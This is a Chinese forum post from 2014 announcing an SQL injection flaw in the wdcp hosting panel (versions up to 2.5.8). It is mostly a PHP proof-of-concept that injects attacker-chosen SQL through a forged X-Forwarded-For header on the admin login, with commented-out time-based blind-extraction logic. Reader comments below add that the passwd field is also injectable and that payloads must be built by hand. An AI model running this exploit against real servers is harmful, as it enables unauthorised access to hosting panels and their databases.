wdcp<=2.5.8注入漏洞 - 源码

标题: wdcp<=2.5.8注入漏洞

时间: 2014-05-04

点击: 3425

<?php
$id=$_GET["id"];
//$id2=$_GET["id2"];
$post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss';
$url=' http://xxx:8080/';
$starttime = time();
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL,$url);
//curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X- FORWARDED-FOR: ,('.$id.'),char(65),1) #'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
ob_start();
curl_exec($ch);
$result = ob_get_contents() ;
ob_end_clean();
$endtime = time();
/*
if($endtime-$starttime>=3){
exit($id." is ".chr($id2));
}*/
echo $result;
?>

[隐藏样式|查看源码]

1 . @funch

(简单/@Ta/2014-05-04 15:05/样/源)

2 . 参数都对吗？

(2/@Ta/2014-05-04 15:20/样/源)

3 . 又有漏洞了啊

(建站小菜/@Ta/2014-05-04 15:29/样/源)

5 . 麻痹用英语写注视

(消失的安装包/@Ta/2014-05-04 17:15/样/源)

6 . @tltl1998，根本就没有注释好不好？那是代码，不是说明

(读书顶个鸟用/@Ta/2014-05-04 17:34/样/源)

7 . @tltl1998，有注释？

(_abc/@Ta/2014-05-04 17:34/样/源)

8 . @齐子 @无名游客语句需要自己构造，半自动，主要是passwd字段存在注入风险。

(简单/@Ta/2014-05-04 21:59/样/源)

9月7日 03:47 星期天

[首页] [回顶] [Jhin主题]

本站由hu60wap6驱动